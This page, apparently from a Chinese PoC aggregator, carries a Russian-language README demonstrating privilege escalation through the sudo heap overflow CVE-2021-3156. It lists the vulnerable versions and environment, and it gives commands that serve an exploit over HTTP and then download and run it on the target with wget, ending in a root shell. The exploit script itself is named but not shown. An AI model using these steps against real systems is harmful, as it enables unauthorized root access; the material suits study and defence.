POC详情: 668d9b58eeb707885d96aa419ed2c563a1117364

来源
关联漏洞
标题: Sudo 缓冲区错误漏洞 (CVE-2021-3156)
描述:Sudo是一款使用于类Unix系统的,允许用户通过安全的方式使用特殊的权限执行命令的程序。 Sudo 1.9.5p2 之前版本存在缓冲区错误漏洞,攻击者可使用sudoedit -s和一个以单个反斜杠字符结束的命令行参数升级到root。
描述
CVE-2021-3156-Exploit-Demo
介绍
# 👑 CVE-2021-3156 (Baron Samedit) — Privilege Escalation via Heap Overflow in sudo

📅 **Дата:** 2025-06-08  
✍️ **Автор:** [@TopskiyPavelQwertyGang](https://github.com/TopskiyPavelQwertyGang)
🧠 Security Researcher | Red Team Enthusiast

---

## 🧠 CVE Overview

- **CVE-ID:** CVE-2021-3156  
- **Тип:** Heap-based Buffer Overflow  
- **Компонент:** `sudoedit` (sudo)  
- **Уровень доступа:** Local  
- **Цель:** Получение root-привилегий

---

## 🧠 Описание
Heap-overflow в `sudoedit` даёт возможность локальному пользователю получить root-доступ  
при выполнении команды `sudoedit` с заранее подготовленными параметрами.

Эксплуатация активна для версий `sudo` < 1.9.5p2, включая популярные образы Ubuntu/Debian/CentOS.  
Даже при включённом ASLR уязвимость остаётся эксплуатируемой.

---

## 🐾 Условия эксплуатации

```bash
OS     : Ubuntu 20.04.3 LTS
glibc  : 2.31 (tcache ON)
sudo   : 1.8.31 (уязвим)
ASLR   : 2 (включён)
```

---

## 🧪 Подготовка окружения

1. Проверены версии `glibc` и `sudo`:
```bash
ldd --version
sudo --version
```

2. Переданы PoC-скрипты с другой машины через встроенный HTTP-сервер:
```bash
python3 -m http.server 80
```

3. На целевой машине PoC скачиваются и исполняются:
```bash
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py
```

---

## 🚀 Успешная эксплуатация Poс

```bash
$ python3 exploit_nss.py
# whoami
root
```

---

## 🧾 Заключение

Эксплуатация `CVE-2021-3156` остаётся возможной даже при активном ASLR, если `glibc` ≥ 2.26 и `sudo` уязвимой версии.  
Наиболее стабильным оказался эксплойт `exploit_nss.py`, срабатывающий с первого раза при корректной конфигурации NSS.

🧨 **Система под контролем.**

---

文件快照

[4.0K] /data/pocs/668d9b58eeb707885d96aa419ed2c563a1117364 ├── [8.0K] exploit_nss.py └── [2.3K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。